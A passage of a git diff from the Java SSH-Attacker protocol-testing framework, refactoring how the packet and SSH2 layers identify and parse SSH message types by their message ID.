raw = packet.getPayload().getValue(); - if (packet instanceof BlobPacket) { - String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); - if (rawText.startsWith("SSH-")) { - return new PacketLayerHint(MessageIdConstant.VERSION_EXCHANGE_MESSAGE); - } else { - final AsciiMessage message = new AsciiMessage(); - AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); - parser.parse(message); - - // If we know what the text message means we can print a - // human-readable warning to the log. The following - // messages are sent by OpenSSH. - final String messageText = message.getText().getValue(); - if ("Invalid SSH identification string.".equals(messageText)) { - LOGGER.warn( - "The server reported the identification string sent by the SSH-Attacker is invalid"); - } else if ("Exceeded MaxStartups".equals(messageText)) { - LOGGER.warn( - "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); - } - return new PacketLayerHint(MessageIdConstant.ASCII_MESSAGE); - } - } - - MessageIdConstant id = - MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext()); - LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); - - switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { - case SSH_MSG_DISCONNECT: - LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_DISCONNECT); - case SSH_MSG_IGNORE: - LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_IGNORE); - case SSH_MSG_UNIMPLEMENTED: - LOGGER.debug("[bro] returning SSH_MSG_UNIMPLEMENTED Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_UNIMPLEMENTED); - case SSH_MSG_DEBUG: - LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_DEBUG); - case SSH_MSG_SERVICE_ACCEPT: - LOGGER.debug("[bro] returning SSH_MSG_SERVICE_ACCEPT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_SERVICE_ACCEPT); - case SSH_MSG_EXT_INFO: - LOGGER.debug("[bro] returning SSH_MSG_EXT_INFO Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_EXT_INFO); - case SSH_MSG_NEWCOMPRESS: - LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_NEWCOMPRESS); - case SSH_MSG_KEXINIT: - LOGGER.debug("[bro] returning SSH KEX INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXINIT); - case SSH_MSG_NEWKEYS: - LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_NEWKEYS); - case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: - LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST_OLD Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); - case SSH_MSG_KEX_DH_GEX_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REQUEST); - case SSH_MSG_KEX_DH_GEX_GROUP: - LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_GROUP Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_GROUP); - case SSH_MSG_KEX_DH_GEX_INIT: - LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_INIT); - case SSH_MSG_KEX_DH_GEX_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REPLY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_DH_GEX_REPLY); - case SSH_MSG_KEXDH_INIT: - LOGGER.debug("[bro] returning SSH_MSG_KEXDH_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXDH_INIT); - case SSH_MSG_KEXDH_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_KEXDH_REPLY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXDH_REPLY); - case SSH_MSG_HBR_INIT: - LOGGER.debug("[bro] returning SSH_MSG_HBR_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_HBR_INIT); - case SSH_MSG_HBR_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_HBR_REPLY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_HBR_REPLY); - case SSH_MSG_SERVICE_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_SERVICE_REQUEST); - case SSH_MSG_KEX_ECDH_INIT: - LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_ECDH_INIT); - case SSH_MSG_KEX_ECDH_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_REPLY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEX_ECDH_REPLY); - case SSH_MSG_ECMQV_INIT: - LOGGER.debug("[bro] returning SSH_MSG_ECMQV_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_ECMQV_INIT); - case SSH_MSG_ECMQV_REPLY: - LOGGER.debug("[bro] returning SSH_MSG_ECMQV_REPLY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_ECMQV_REPLY); - case SSH_MSG_KEXRSA_PUBKEY: - LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_PUBKEY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_PUBKEY); - case SSH_MSG_KEXRSA_SECRET: - LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_SECRET Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_SECRET); - case SSH_MSG_KEXRSA_DONE: - LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_DONE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_DONE); - case SSH_MSG_KEXGSS_INIT: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_INIT Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_INIT); - case SSH_MSG_KEXGSS_CONTINUE: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_CONTINUE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_CONTINUE); - case SSH_MSG_KEXGSS_COMPLETE: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_COMPLETE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_COMPLETE); - case SSH_MSG_KEXGSS_HOSTKEY: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_HOSTKEY Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_HOSTKEY); - case SSH_MSG_KEXGSS_ERROR: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_ERROR Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_ERROR); - case SSH_MSG_KEXGSS_GROUPREQ: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUPREQ Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_GROUPREQ); - case SSH_MSG_KEXGSS_GROUP: - LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUP Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_GROUP); - case SSH_MSG_USERAUTH_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_REQUEST); - case SSH_MSG_USERAUTH_FAILURE: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_FAILURE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_FAILURE); - case SSH_MSG_USERAUTH_SUCCESS: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_SUCCESS Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_SUCCESS); - case SSH_MSG_USERAUTH_BANNER: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_BANNER Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_BANNER); - case SSH_MSG_USERAUTH_PK_OK: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PK_OK Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_PK_OK); - case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_PASSWD_CHANGEREQ); - case SSH_MSG_USERAUTH_INFO_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_INFO_REQUEST); - case SSH_MSG_USERAUTH_INFO_RESPONSE: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_RESPONSE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_INFO_RESPONSE); - case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_RESPONSE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_RESPONSE); - case SSH_MSG_USERAUTH_GSSAPI_TOKEN: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_TOKEN Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_TOKEN); - case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Hint"); - return new PacketLayerHint( - MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); - case SSH_MSG_USERAUTH_GSSAPI_ERROR: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERROR Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_ERROR); - case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERRTOK Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_ERRTOK); - case SSH_MSG_USERAUTH_GSSAPI_MIC: - LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_MIC Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_MIC); - case SSH_MSG_GLOBAL_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_GLOBAL_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_GLOBAL_REQUEST); - case SSH_MSG_REQUEST_SUCCESS: - LOGGER.debug("[bro] returning SSH_MSG_REQUEST_SUCCESS Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_REQUEST_SUCCESS); - case SSH_MSG_REQUEST_FAILURE: - LOGGER.debug("[bro] returning SSH_MSG_REQUEST_FAILURE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_REQUEST_FAILURE); - case SSH_MSG_CHANNEL_OPEN: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN); - case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); - case SSH_MSG_CHANNEL_OPEN_FAILURE: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN_FAILURE); - case SSH_MSG_CHANNEL_WINDOW_ADJUST: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_WINDOW_ADJUST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_WINDOW_ADJUST); - case SSH_MSG_CHANNEL_DATA: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_DATA); - case SSH_MSG_CHANNEL_EXTENDED_DATA: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EXTENDED_DATA Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_EXTENDED_DATA); - case SSH_MSG_CHANNEL_EOF: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EOF Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_EOF); - case SSH_MSG_CHANNEL_CLOSE: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_CLOSE); - case SSH_MSG_CHANNEL_REQUEST: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_REQUEST Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_REQUEST); - case SSH_MSG_CHANNEL_SUCCESS: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_SUCCESS Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_SUCCESS); - case SSH_MSG_CHANNEL_FAILURE: - LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_FAILURE Hint"); - return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_FAILURE); - case UNKNOWN: - LOGGER.debug("[bro] returning UNKNOWN Hint"); - return new PacketLayerHint(MessageIdConstant.UNKNOWN); - default: - LOGGER.debug( - "[bro] cannot identifie {} as {} - returningn null", - raw[1], - MessageIdConstant.fromId( - packet.getPayload().getValue()[0], context.getContext())); - return null; + currentInputStream.setHint(null); } + currentInputStream.extendStream(packet.getPayload().getValue()); } public PacketCipher getEncryptorCipher() { @@ -497,7 +229,6 @@ public void updateEncryptionCipher(PacketCipher encryptionCipher) { + encryptionCipher.getClass().getSimpleName() + ")"); encryptor.addNewPacketCipher(encryptionCipher); - writeEpoch++; } public void updateDecryptionCipher(PacketCipher decryptionCipher) { @@ -506,7 +237,6 @@ public void updateDecryptionCipher(PacketCipher decryptionCipher) { + decryptionCipher.getClass().getSimpleName() + ")"); decryptor.addNewPacketCipher(decryptionCipher); - readEpoch++; } protected void decryptPacket(AbstractPacket packet) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 8adc79f2f..4968a8b2b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -20,6 +20,9 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; import de.rub.nds.sshattacker.core.protocol.common.*; @@ -28,9 +31,11 @@ import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestUnknownMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestUnknownMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.*; +import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -84,7 +89,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { runningProtocolMessageType = message.getMessageIdConstant(); processMessage(message, collectedMessageStream); addProducedContainer(message); - flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + // flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + getLowerLayer() + .sendData( + new PacketLayerHint(runningProtocolMessageType), + collectedMessageStream.toByteArray()); ProtocolMessageHandler handler = message.getHandler(context); if (handler instanceof MessageSentHandler) { @@ -142,17 +151,32 @@ public LayerProcessingResult receiveData() { LOGGER.warn("The lower layer did not produce a data stream: ", e); return getLayerResult(); } - LOGGER.debug("[bro] Searching for Hint"); + LOGGER.debug("[bro] Searching for Message"); LayerProcessingHint tempHint = dataStream.getHint(); - if (tempHint == null) { - LOGGER.warn( - "The SSH message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); - readUnknownProtocolData(); - } else if (tempHint instanceof PacketLayerHint) { - PacketLayerHint hint = (PacketLayerHint) dataStream.getHint(); - readMessageForHint(hint); + + byte[] streamContent; + try { + LOGGER.debug("I could read {} bytes", dataStream.available()); + streamContent = dataStream.readChunk(dataStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + AbstractPacket packet; + + LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); + if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { + packet = new BinaryPacket(); + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { + packet = new BlobPacket(); + } else { + throw new RuntimeException(); } - // receive until the layer configuration is satisfied or no data is left + + packet.setPayload(streamContent); + + parseMessageFromID(packet, context); + } while (shouldContinueProcessing()); } catch (TimeoutException ex) { LOGGER.debug(ex); @@ -161,99 +185,281 @@ public LayerProcessingResult receiveData() { return getLayerResult(); } - public void readMessageForHint(PacketLayerHint hint) { - switch (hint.getType()) { - // use correct parser for the message - case ASCII_MESSAGE: - readASCIIData(); - break; - case VERSION_EXCHANGE_MESSAGE: - readVersionExchangeProtocolData(); - break; + public void parseMessageFromID(AbstractPacket packet, SshContext context) { + byte[] raw = packet.getPayload().getValue(); + if (packet instanceof BlobPacket) { + String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); + if (rawText.startsWith("SSH-")) { + readVersionExchangeProtocolData((BlobPacket) packet); + return; + } else { + final AsciiMessage message = new AsciiMessage(); + AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); + parser.parse(message); + + // If we know what the text message means we can print a + // human-readable warning to the log. The following + // messages are sent by OpenSSH. + final String messageText = message.getText().getValue(); + if ("Invalid SSH identification string.".equals(messageText)) { + LOGGER.warn( + "The server reported the identification string sent by the SSH-Attacker is invalid"); + } else if ("Exceeded MaxStartups".equals(messageText)) { + LOGGER.warn( + "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); + } + readASCIIData((BlobPacket) packet); + return; + } + } + + MessageIdConstant id = + MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext()); + LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); + + switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { + case SSH_MSG_DISCONNECT: + LOGGER.debug("[bro] parsing SSH_MSG_DISCONNECT Message"); + readDisconnect((BinaryPacket) packet); + return; + case SSH_MSG_IGNORE: + LOGGER.debug("[bro] parsing SSH_MSG_IGNORE Message"); + readIngoreMessage((BinaryPacket) packet); + return; + case SSH_MSG_UNIMPLEMENTED: + LOGGER.debug("[bro] parsing SSH_MSG_UNIMPLEMENTED Message"); + return; + case SSH_MSG_DEBUG: + LOGGER.debug("[bro] parsing SSH_MSG_DEBUG Message"); + return; + case SSH_MSG_SERVICE_ACCEPT: + LOGGER.debug("[bro] parsing SSH_MSG_SERVICE_ACCEPT Message"); + readMsgServiceAccept((BinaryPacket) packet); + return; + case SSH_MSG_EXT_INFO: + LOGGER.debug("[bro] parsing SSH_MSG_EXT_INFO Message"); + return; + case SSH_MSG_NEWCOMPRESS: + LOGGER.debug("[bro] parsing SSH_MSG_NEWCOMPRESS Message"); + return; case SSH_MSG_KEXINIT: - readKexInitProtocolData(); - break; - case SSH_MSG_HBR_INIT: - readHbrInitProtocolData(); - break; + LOGGER.debug("[bro] parsing SSH KEX INIT Message"); + readKexInitProtocolData((BinaryPacket) packet); + return; case SSH_MSG_NEWKEYS: - readNewKeysProtocolData(); - break; - case SSH_MSG_SERVICE_REQUEST: - readServiceRequestData(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_NEWKEYS Message"); + readNewKeysProtocolData((BinaryPacket) packet); + return; + case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REQUEST_OLD Message"); + readGexDHExchangeOldRequest((BinaryPacket) packet); + return; + case SSH_MSG_KEX_DH_GEX_REQUEST: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REQUEST Message"); + readGexDHExchangeRequest((BinaryPacket) packet); + return; + case SSH_MSG_KEX_DH_GEX_GROUP: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_GROUP Message"); + readGexKeyExchangeGroup((BinaryPacket) packet); + return; + case SSH_MSG_KEX_DH_GEX_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_INIT Message"); + readGexDHExchangeInitMessage((BinaryPacket) packet); + return; + case SSH_MSG_KEX_DH_GEX_REPLY: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REPLY Message"); + readGexDHExchangeReplyMessage((BinaryPacket) packet); + return; + case SSH_MSG_KEXDH_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_KEXDH_INIT Message"); + readDhKeyInitMessage((BinaryPacket) packet); + return; + case SSH_MSG_KEXDH_REPLY: + LOGGER.debug("[bro] parsing SSH_MSG_KEXDH_REPLY Message"); + readDhKeyReplyMessage((BinaryPacket) packet); + return; + case SSH_MSG_HBR_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_HBR_INIT Message"); + readHbrInitProtocolData((BinaryPacket) packet); + return; case SSH_MSG_HBR_REPLY: - readHbrReplProtocolData(); - break; - case SSH_MSG_SERVICE_ACCEPT: - readMsgServiceAccept(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_HBR_REPLY Message"); + readHbrReplProtocolData((BinaryPacket) packet); + return; + case SSH_MSG_SERVICE_REQUEST: + LOGGER.debug("[bro] parsing SSH_MSG_SERVICE_REQUEST Message"); + readServiceRequestData((BinaryPacket) packet); + return; + case SSH_MSG_KEX_ECDH_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_ECDH_INIT Message"); + readKexECDHInit((BinaryPacket) packet); + return; + case SSH_MSG_KEX_ECDH_REPLY: + LOGGER.debug("[bro] parsing SSH_MSG_KEX_ECDH_REPLY Message"); + readKexECDHReply((BinaryPacket) packet); + return; + case SSH_MSG_ECMQV_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_ECMQV_INIT Message"); + return; + case SSH_MSG_ECMQV_REPLY: + LOGGER.debug("[bro] parsing SSH_MSG_ECMQV_REPLY Message"); + return; + case SSH_MSG_KEXRSA_PUBKEY: + LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_PUBKEY Message"); + readKeyExchangeRSAPubkeyMessage((BinaryPacket) packet); + return; + case SSH_MSG_KEXRSA_SECRET: + LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_SECRET Message"); + readKeyExchangeRSASecret((BinaryPacket) packet); + return; + case SSH_MSG_KEXRSA_DONE: + LOGGER.debug("[bro] parsing SSH_MSG_KEXRSA_DONE Message"); + readKeyExchangeRSADone((BinaryPacket) packet); + return; + case SSH_MSG_KEXGSS_INIT: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_INIT Message"); + return; + case SSH_MSG_KEXGSS_CONTINUE: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_CONTINUE Message"); + return; + case SSH_MSG_KEXGSS_COMPLETE: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_COMPLETE Message"); + return; + case SSH_MSG_KEXGSS_HOSTKEY: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_HOSTKEY Message"); + return; + case SSH_MSG_KEXGSS_ERROR: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_ERROR Message"); + return; + case SSH_MSG_KEXGSS_GROUPREQ: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_GROUPREQ Message"); + return; + case SSH_MSG_KEXGSS_GROUP: + LOGGER.debug("[bro] parsing SSH_MSG_KEXGSS_GROUP Message"); + return; case SSH_MSG_USERAUTH_REQUEST: - readUserAuthReq(); - break; - case SSH_MSG_CHANNEL_OPEN: - readChannelOpen(); - break; - case SSH_MSG_CHANNEL_REQUEST: - readChannelRequest(); - break; - case SSH_MSG_GLOBAL_REQUEST: - readGlobalRequest(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_REQUEST Message"); + readUserAuthReq((BinaryPacket) packet); + return; + case SSH_MSG_USERAUTH_FAILURE: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_FAILURE Message"); + readUserAuthFail((BinaryPacket) packet); + return; case SSH_MSG_USERAUTH_SUCCESS: - readUserAuthSucc(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_SUCCESS Message"); + readUserAuthSucc((BinaryPacket) packet); + return; + case SSH_MSG_USERAUTH_BANNER: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_BANNER Message"); + readUserAuthBanner((BinaryPacket) packet); + return; + case SSH_MSG_USERAUTH_PK_OK: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_PK_OK Message"); + return; + case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Message"); + return; + case SSH_MSG_USERAUTH_INFO_REQUEST: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_INFO_REQUEST Message"); + readUserAuthInfoReq((BinaryPacket) packet); + return; + case SSH_MSG_USERAUTH_INFO_RESPONSE: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_INFO_RESPONSE Message"); + readUserAuthInfoResp((BinaryPacket) packet); + return; + case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_RESPONSE Message"); + return; + case SSH_MSG_USERAUTH_GSSAPI_TOKEN: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_TOKEN Message"); + return; + case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Message"); + return; + case SSH_MSG_USERAUTH_GSSAPI_ERROR: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_ERROR Message"); + return; + case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_ERRTOK Message"); + return; + case SSH_MSG_USERAUTH_GSSAPI_MIC: + LOGGER.debug("[bro] parsing SSH_MSG_USERAUTH_GSSAPI_MIC Message"); + return; + case SSH_MSG_GLOBAL_REQUEST: + LOGGER.debug("[bro] parsing SSH_MSG_GLOBAL_REQUEST Message"); + readGlobalRequest((BinaryPacket) packet); + return; + case SSH_MSG_REQUEST_SUCCESS: + LOGGER.debug("[bro] parsing SSH_MSG_REQUEST_SUCCESS Message"); + readRequestSuccess((BinaryPacket) packet); + return; + case SSH_MSG_REQUEST_FAILURE: + LOGGER.debug("[bro] parsing SSH_MSG_REQUEST_FAILURE Message"); + readRequestFailure((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_OPEN: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN Message"); + readChannelOpen((BinaryPacket) packet); + return; case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - readChannelOpenConfirmation(); - break; - case SSH_MSG_CHANNEL_CLOSE: - readChannelCloseMessage(); - break; - case SSH_MSG_CHANNEL_EOF: - readChannelEofMessage(); - break; - case SSH_MSG_CHANNEL_EXTENDED_DATA: - readChannelExtendedDataMessage(); - break; - case SSH_MSG_CHANNEL_FAILURE: - readChannelFailureMessage(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN_CONFIRMATION Message"); + readChannelOpenConfirmation((BinaryPacket) packet); + return; case SSH_MSG_CHANNEL_OPEN_FAILURE: - readChannelOpenFailureMessage(); - break; + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_OPEN_FAILURE Message"); + readChannelOpenFailureMessage((BinaryPacket) packet); + return; + case SSH_MSG_CHANNEL_WINDOW_ADJUST: + LOGGER.debug("[bro] parsing SSH_MSG_CHANNEL_WINDOW_ADJUST Message"); + readChannelWindowsAdjust((BinaryPacket) packet); + return; + case 